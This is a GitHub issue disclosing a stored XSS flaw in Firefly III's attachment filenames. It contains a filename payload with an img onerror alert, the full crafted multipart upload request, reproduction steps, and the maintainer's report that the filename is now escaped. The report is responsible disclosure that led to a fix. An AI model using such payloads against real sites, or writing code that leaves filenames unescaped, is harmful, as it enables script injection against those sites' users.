Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in filename #2337

Closed
dayn1ne opened this issue Jul 16, 2019 · 4 comments
Closed

Stored XSS in filename #2337

dayn1ne opened this issue Jul 16, 2019 · 4 comments
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).

Comments

@dayn1ne
Copy link

dayn1ne commented Jul 16, 2019

Description
Current version of Firefly III Version 4.7.17.2 is vulnerable to stored XSS due to lack of filtration of user-supplied data in file names. Malicious attacker can upload specially crafted image, which contains javascript code in its name. Malicious javascript code will be executed when user edit this attachment (http://firefly.host/attachments/edit/$file_id$).

But this file can be created only on Linux or you can edit field name in local proxy (e.g. Burp Suite)

If you want to edit request you should change this part of request, mainly filename part

Content-Disposition: form-data; name="attachments[]"; filename="<img src=x onerror=alert(document.domain)>"
Content-Type: image/jpeg

Request

POST /transactions/update/3 HTTP/1.1
Host: firefly.host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------130053325118313125241968558600
Content-Length: 2580
Cookie: firefly_session=<Your session cookie here>
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="_token"

<Your token here>
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="id"

3
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="what"

withdrawal
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="description"

lol
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="source_id"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="destination_name"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="amount_currency_id_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="native_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="source_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="destination_amount"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="date"

2019-07-15
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="budget_id"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="category"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="tags"

lol
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="interest_date"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="notes"


-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="attachments[]"; filename="<img src=x onerror=alert(document.domain)>"
Content-Type: image/jpeg

1

-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="source_account_currency"

1
-----------------------------130053325118313125241968558600
Content-Disposition: form-data; name="destination_account_currency"

0
-----------------------------130053325118313125241968558600--

Steps to reproduce

  1. Download attached zip file and extract image (but it works only on Linux 'cause of characters in filename)
  2. Create new or update exist transaction and upload file
  3. After uploaded attachment go to attachment page and click to edit this file

PoC image
Screenshot 2019-07-16 at 12 38 14

Image for testing
xss_file_name_file.zip

@JC5
Copy link
Member

JC5 commented Jul 16, 2019

Thanks, I'll pick it up tonight.

@JC5
Copy link
Member

JC5 commented Jul 16, 2019

Fixed by escaping the file name. I'll push a fix later tonight.

@JC5 JC5 closed this as completed in 17a66b3 Jul 16, 2019
@JC5 JC5 added bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release). labels Jul 16, 2019
@JC5
Copy link
Member

JC5 commented Jul 16, 2019

@JC5 JC5 reopened this Jul 16, 2019
@dayn1ne
Copy link
Author

dayn1ne commented Jul 17, 2019

Confirm, bug is not reproducible anymore

@JC5 JC5 closed this as completed Aug 3, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jan 19, 2020
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).
Projects
None yet
Development

No branches or pull requests

2 participants